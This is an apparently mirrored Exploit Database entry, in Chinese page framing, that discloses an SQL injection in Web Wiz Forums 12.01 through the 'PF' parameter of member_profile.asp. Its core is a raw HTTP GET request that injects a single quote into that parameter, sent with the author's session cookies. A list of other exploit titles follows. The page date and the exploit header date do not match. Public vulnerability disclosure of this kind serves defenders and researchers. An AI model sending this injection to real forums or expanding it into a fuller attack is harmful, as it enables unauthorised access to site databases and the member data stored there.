Web Wiz Forums 12.01 – ‘PF’ SQL Injection

Exploit Database
37 阅读

作者： n1x_

日期： 2019-08-16
类别：
- webapps
平台：
- asp
来源：https://www.exploit-db.com/exploits/47284/

# Exploit Title: Web Wiz Forums 12.01 - 'PF' SQL Injection
# Date: 2019-09-16
# Exploit Author: n1x_ [MS-WEB]
# Vendor Homepage: https://www.webwiz.net/web-wiz-forums/forum-downloads.htm
# Version: 12.01
# Tested on Windows

# Vulnerable parameter: PF (member_profile.asp)
# GET Request

GET /member_profile.asp?PF=10' HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: wwf10lVisit=LV=2019%2D08%2D16+14%3A55%3A50; wwf10sID=SID=1784%2Da7facz6e8757e8ae7b746221064815; ASPSESSIONIDQACRQTCC=OKJNGKBDFFNFKFDJMFIFPBLD
Connection: close
Upgrade-Insecure-Requests: 1

last Exploits
Web Wiz Forums 12.01 – ‘PF’ SQL Injection的更多信息

Aplaya Beach Resort Online Reservation System 1.0 – SQL Injection / Cross-Site Request Forgery：
WordPress Plugin Duplicator 1.3.26 – Unauthenticated Arbitrary File Read (Metasploit)：
Boonex Dolphin 7.3.2 – Authentication Bypass：
MyBB Latest Posts on Profile Plugin 1.1 – Cross-Site Scripting：
Car Rental Management System 1.0 – Arbitrary File Upload：
LittleSite 0.1 – ‘index.php’ Local File Inclusion：
SevenIT SevDesk 3.10 – Multiple Web Vulnerabilities：
Atlassian Jira Server Data Center 8.16.0 – Reflected Cross-Site Scripting (XSS)：